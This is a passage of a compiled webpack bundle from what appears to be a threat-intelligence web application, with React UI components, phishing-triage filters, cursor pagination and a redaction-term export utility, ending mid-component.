var TRIAGE_OPTIONS = [{ label: 'Unresolved', payload: PHISHING_SCORE_VALUES.UNRESOLVED }, { label: 'Confirmed', payload: PHISHING_SCORE_VALUES.CONFIRMED }, { label: 'Ignored', payload: PHISHING_SCORE_VALUES.IGNORED }];
var DATE_OPTIONS = [{ label: 'Previous 1 Month', payload: __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__["a" /* default */].LAST_MONTH }, { label: 'Previous 14 Days', payload: __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__["a" /* default */].LAST_FOURTEEN_DAYS }, { label: 'Previous 7 Days', payload: __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__["a" /* default */].LAST_SEVEN_DAYS }, { label: 'Previous 1 Day', payload: __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__["a" /* default */].YESTERDAY }, { label: 'Previous 12 Hours', payload: __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__["a" /* default */].LAST_TWELVE_HOURS }, { label: 'Previous 1 Hour', payload: __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__["a" /* default */].LAST_HOUR }];

// TODO Naming
var SCORES_NOT_TO_FILTER_BY = ['UNKNOWN'];
var SCORE_FILTER_OPTIONS = Object.values(TRIAGE_STATUSES_TO_NAMES).filter(function (score) {
  return !SCORES_NOT_TO_FILTER_BY.includes(score);
});

var DEFAULT_DATE_OPTION = { label: 'Previous 1 Day', payload: __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__["a" /* default */].YESTERDAY };

/***/ }),
/* 1640 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(3430);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1471);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(801);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "e", function() { return __WEBPACK_IMPORTED_MODULE_2__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(3431);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(3432);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });










/***/ }),
/* 1641 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Paginator; });
/* unused harmony export PureComponent */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return StyledPageButton; });
/* unused harmony export StyledPaginator */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_themes__ = __webpack_require__(77);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_themes_common__ = __webpack_require__(212);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:Paginator'); // eslint-disable-line no-unused-vars





// Style
var StyledPaginator = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Paginator__StyledPaginator',
  componentId: 'sc-13rhoc3-0'
})(['display:inline-flex;height:', ';flex-direction:row;> div{&:last-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}&:first-child{margin-right:1px;border-bottom-right-radius:3px;border-top-right-radius:3px;}}'], function (props) {
  return props.small ? '2rem' : '3.5rem';
});

var StyledPageButton = __WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Paginator__StyledPageButton',
  componentId: 'sc-13rhoc3-1'
})(['display:flex;justify-content:center;align-items:center;height:3.5rem;width:3.65rem;border:1px solid ', ';transform:rotate(180deg);background-color:', ';cursor:pointer;&:hover{background-color:', ';i{color:', ' !important;}}', '     ', ' ', ' i{font-weight:700;color:', ';font-size:0.7rem;}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.BLACK.X100;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.BLACK.X50;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref5) {
  var theme = _ref5.theme,
      disabledButton = _ref5.disabledButton;
  return disabledButton && Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["b" /* css */])(['opacity:0.5;background-color:', ';pointer-events:none;&& > i{color:', ';}'], theme.ThemeColors.BLACK.X50, theme.ThemeColors.TEXT.hex);
}, function (_ref6) {
  var theme = _ref6.theme;
  return Object(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_themes_common__["inDarkMode"])(theme) && Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["b" /* css */])(['&&{background-color:', ';color:', ';border:1px solid ', ';&:hover{background-color:', ';i{color:', ' !important;}}}'], theme.ThemeColors.SEARCH_BAR.hex, theme.ThemeColors.BLACK.hex, theme.ThemeColors.BORDER.hex, theme.ThemeColors.SEARCH_BAR.X500, theme.ThemeColors.TEXT.hex);
}, function (props) {
  return props.small && Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["b" /* css */])(['height:2rem;width:2.15rem;']);
}, function (_ref7) {
  var theme = _ref7.theme;
  return theme.ThemeColors.TEXT.hex;
});

var initialValues = {
  disabled: false,
  theme: __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_themes__["b" /* DefaultTheme */]
};

// Bindings

var Paginator = function (_Component) {
  _inherits(Paginator, _Component);

  function Paginator() {
    var _ref8;

    var _temp, _this, _ret;

    _classCallCheck(this, Paginator);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref8 = Paginator.__proto__ || Object.getPrototypeOf(Paginator)).call.apply(_ref8, [this].concat(args))), _this), _this.methodOne = function (option) {}, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(Paginator, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var _props = this.props,
          disableLeft = _props.disableLeft,
          disableRight = _props.disableRight,
          pageRight = _props.pageRight,
          pageLeft = _props.pageLeft,
          small = _props.small,
          disabled = _props.disabled,
          theme = _props.theme;


      var canPageLeft = function canPageLeft() {
        return !(disabled || disableLeft);
      };
      var canPageRight = function canPageRight() {
        return !(disabled || disableRight);
      };

      var safePageLeft = function safePageLeft() {
        return canPageLeft() ? pageLeft : function () {};
      };
      var safePageRight = function safePageRight() {
        return canPageRight() ? pageRight : function () {};
      };
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledPaginator,
        this.props,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          StyledPageButton,
          {
            small: small,
            onClick: safePageLeft(),
            'aria-label': 'backward',
            disabledButton: !canPageLeft() },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["s" /* IconLookup */].CHEVRON_RIGHT })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          StyledPageButton,
          {
            small: small,
            onClick: safePageRight(),
            'aria-label': 'forward',
            disabledButton: !canPageRight() },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["s" /* IconLookup */].CHEVRON_LEFT })
        )
      );
    }

    // ----Lifecycle Hooks----

    // ----Methods----

  }]);

  return Paginator;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Connect To State


Paginator.defaultProps = initialValues;
var mapStateToProps = function mapStateToProps(state) {
  return {
    disabled: false // Some variable,
  };
};

var dispatchProps = {
  methodOne: function methodOne() {} // Some action
};

// export



/***/ }),
/* 1642 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__context__ = __webpack_require__(3552);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__context__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters__ = __webpack_require__(1643);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_1__getters__; });




/***/ }),
/* 1643 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getTagMap", function() { return getTagMap; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



var getTagMap = function getTagMap(mitreAttackThreatModel) {
  return mitreAttackThreatModel.get('items', Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])()).reduce(function (acc, curr, i) {
    return acc.set(curr.get('key'), curr);
  }, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])());
};

/***/ }),
/* 1644 */,
/* 1645 */,
/* 1646 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return mapRedactables; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return validateTerm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return exportRedactionLibrary; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_fp_Either__ = __webpack_require__(299);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_csv__ = __webpack_require__(1330);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__constants_js__ = __webpack_require__(412);





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:modules:redaction:actions');






/**
 * TODO: What should the default value be?
 * What should we return if there is an error getting a cat ID?
 */
var getCategoryIdByType = function getCategoryIdByType(type) {
  var result = null;

  try {
    switch (type) {
      case 'EMAIL':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Email Address').get('id');
        break;
      case 'PERSON':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Person').get('id');
        break;
      case 'PHONE':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Phone').get('id');
        break;
      case 'CREDIT_CARD':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Account Number').get('id');
        break;
      case 'IP':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('IP Address').get('id');
        break;
      case 'ORGANIZATION':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Organization').get('id');
        break;
      case 'LOCATION':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Location').get('id');
        break;
      case 'URL':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('URL').get('id');
        break;
      case 'SSN':
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Social Security Number').get('id');
        break;
      case 'PASSWORD':
      default:
        result = Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["f" /* categoryByName */])('Other Identifying Info').get('id');
    }
  } catch (err) {
    debug('Could not find category for type ' + type, err);
  }

  return result;
};

var categoryNameByTerm = function categoryNameByTerm(term) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["toUpper"])(Object(__WEBPACK_IMPORTED_MODULE_5__constants_js__["e" /* categoryById */])(term.get('categoryId')).get('name'));
};

/**
 * Converts the redaction terms into a CSV where the first column is the text
 * and the second column is the capitalized category name.
 */
var convertTermsToCsv = function convertTermsToCsv(terms) {
  return terms.map(function (term) {
    return term.get('text') + ',' + categoryNameByTerm(term);
  }).join('\n');
};

/**
 * IMPORTANT: The types that come down on redactables don't map 1-to-1 to our
 * categories and a category is necessary to actually redact something. As such
 * we use the type to infer a category.
 *
 * NOTE: This is fragile. If the names of the categories were to change this
 * would no longer work.
 */
var mapRedactables = function mapRedactables(redactables) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(redactables).map(function (v, k) {
    var category = v.get('category');
    return v.set('categoryId', getCategoryIdByType(category));
  });
};

var validateTerm = function validateTerm(_ref, exists) {
  var text = _ref.text,
      type = _ref.type,
      categoryId = _ref.categoryId;

  if (!type) return 'Invalid redaction type.';
  if (!categoryId) return 'Invalid category.';
  if (text.trim().length < 2) {
    return 'Redaction terms must be at least 2 characters long.';
  }

  if (exists) {
    return 'Term already exists. NOTE: Terms are not case sensitive.';
  }

  // If we return null then that means validation passed
  return null;
};

/* Export a map of redaction terms to a JSON file */
var exportRedactionLibrary = function exportRedactionLibrary(terms, format) {

  var exportFileName = 'RedactionTerms.' + format;

  switch (format) {
    case 'json':
      terms = terms.map(function (term) {
        return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
          text: term.get('text'),
          category: categoryNameByTerm(term)
        });
      });
      try {
        var termsJson = JSON.stringify(terms, null, 2);
        debug(Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["saveTextToFile"])(exportFileName, termsJson));
      } catch (err) {
        debug('error exporting redaction library to json');
      }
      break;
    case 'csv':
      try {
        var termsCsv = convertTermsToCsv(terms);
        var sanitizedCsv = Object(__WEBPACK_IMPORTED_MODULE_4__utils_csv__["a" /* sanitizeCsvFields */])(termsCsv);
        debug(Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["saveTextToFile"])(exportFileName, sanitizedCsv));
      } catch (err) {
        debug('error exporting redaction library csv');
      }
      break;
    default:
      debug('Invalid format for exporting redaction library: ' + format);
      break;
  }
};

/***/ }),
/* 1647 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(3204);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__defaults_js__ = __webpack_require__(765);
/* unused harmony reexport defaults */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__getters_js__ = __webpack_require__(766);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_2__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(3205);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__epics_js__ = __webpack_require__(3206);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_4__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types_js__ = __webpack_require__(767);
/* unused harmony reexport types */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_js__ = __webpack_require__(1419);
/* unused harmony reexport utils */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__constants_js__ = __webpack_require__(1418);
/* unused harmony reexport constants */

















/***/ }),
/* 1648 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "storeScrollPosition", function() { return storeScrollPosition; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDetailPanelOptions", function() { return setDetailPanelOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types__ = __webpack_require__(1430);



var storeScrollPosition = function storeScrollPosition(key, value) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["b" /* STORE_SCROLL_POSITION */],
    payload: { key: key, value: value }
  };
};

var setDetailPanelOptions = function setDetailPanelOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["a" /* SET_DETAIL_PANEL_OPTIONS */],
    payload: options
  };
};

/***/ }),
/* 1649 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1470);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants_js__ = __webpack_require__(570);
/* unused harmony reexport constants */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_js__ = __webpack_require__(3426);
/* unused harmony reexport utils */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__getters_js__ = __webpack_require__(908);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_3__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__stores_js__ = __webpack_require__(3428);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_4__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__epics_js__ = __webpack_require__(3429);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_5__epics_js__["a"]; });












/***/ }),
/* 1650 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return useCursorPagination; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();




var CURSOR_DIRECTIONS = {
  NEXT: 'NEXT',
  PREVIOUS: 'PREVIOUS'
};

var useCursorPagination = function useCursorPagination() {
  var _React$useState = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(0),
      _React$useState2 = _slicedToArray(_React$useState, 2),
      currentPage = _React$useState2[0],
      setCurrentPage = _React$useState2[1];

  var _React$useState3 = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(''),
      _React$useState4 = _slicedToArray(_React$useState3, 2),
      cursorForCurrentPage = _React$useState4[0],
      setCursorForCurrentPage = _React$useState4[1];

  // Handles cursor pagination by keeping the state of the last current and next page query cursor values


  var _React$useState5 = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useState(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])([''])),
      _React$useState6 = _slicedToArray(_React$useState5, 2),
      cursorTimeline = _React$useState6[0],
      setCursorTimeline = _React$useState6[1];

  var goBackward = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useCallback(function () {
    if (currentPage > 0) {
      var newCurrentCursor = cursorTimeline.get(currentPage - 1);

      setCursorForCurrentPage(newCurrentCursor);
      setCurrentPage(currentPage - 1);

      return newCurrentCursor;
    }
  }, [currentPage, cursorTimeline]);

  var goForward = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useCallback(function () {
    if (currentPage < cursorTimeline.size) {
      var newCurrentCursor = cursorTimeline.get(currentPage + 1);

      setCursorForCurrentPage(newCurrentCursor);
      setCurrentPage(currentPage + 1);

      return newCurrentCursor;
    }
  }, [currentPage, cursorTimeline]);

  var addNextCursor = function addNextCursor(cursorValue) {
    setCursorTimeline(cursorTimeline.push(cursorValue));
  };

  var resetValues = function resetValues() {
    setCurrentPage(0);
    setCursorForCurrentPage('');
    setCursorTimeline(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])(['']));
  };

  // TODO:Future Add listener to auto-reset cursor control

  return {
    goForward: goForward,
    goBackward: goBackward,
    cursorForCurrentPage: cursorForCurrentPage,
    currentPage: currentPage,
    addNextCursor: addNextCursor,
    resetValues: resetValues,
    cursorTimeline: cursorTimeline
  };
};

/***/ }),
/* 1651 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "reload.22cec70fc3aaa7c83a883f3f15e3c3dd.svg";

/***/ }),
/* 1652 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "next.12b04fc756ca6ddd24e1731c4820a2e8.svg";

/***/ }),
/* 1653 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "prev.9b619b2a5bd58b3a9bdea3b58ac9a7f2.svg";

/***/ }),
/* 1654 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "funnel.f8acdfa7e28c3cb09f0d79723b71c788.svg";

/***/ }),
/* 1655 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "magnifier.07371979aa9ca2e9f8a8ec78216b06bd.svg";

/***/ }),
/* 1656 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "calendar-full.6205658f742f6a73c91b86f07052371f.svg";

/***/ }),
/* 1657 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "download.84f03974dc7c351f2e951f0e79289e1c.svg";

/***/ }),
/* 1658 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "floppy-disk.66fb91a0f884b15cd3143d72e3289ddc.svg";

/***/ }),
/* 1659 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "cog.18d96796365b31959d61554af69b1dcf.svg";

/***/ }),
/* 1660 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "redo.7678acc0b282f708ee87ca82fb7a6029.svg";

/***/ }),
/* 1661 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "undo.aeea430e2ec71a5289929dbfa4893be0.svg";

/***/ }),
/* 1662 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SearchBar; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_themes__ = __webpack_require__(77);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:components:SearchBar'); // eslint-disable-line no-unused-vars




// Style
var StyledSearchBar = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'SearchBar__StyledSearchBar',
  componentId: 'sc-8vq7he-0'
})(['&&{display:flex;align-items:center;justify-content:center;background-color:transparent;> div{width:100%;}input{width:100%;border:transparent;padding:0.5rem 0.5rem 0.5rem 1.25rem;background:', ';color:', ';border-radius:0;border-top-left-radius:4px;border-bottom-left-radius:4px;height:2.67rem;}:focus,:active{}.searchButtonEnd{width:4rem;height:2.67rem;display:inline-flex;justify-content:center;align-items:center;background-color:', ';color:', ';border-bottom-right-radius:4px;border-top-right-radius:4px;padding:0 1.5rem;}.searchButtonEnd:hover{background-color:', ';cursor:pointer;}}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SEARCH_BAR_INPUT.X500;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.Config.name === 'Default Theme' ? theme.ThemeColors.SEARCH_FILTER_BAR_BUTTON.hex : theme.ThemeColors.SEARCH_FILTER_BAR_BUTTON.X400;
} /* Fjord_400 for dark, thunder for default */, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.DARK.buttonText;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.SEARCH_FILTER_BAR_BUTTON.X400;
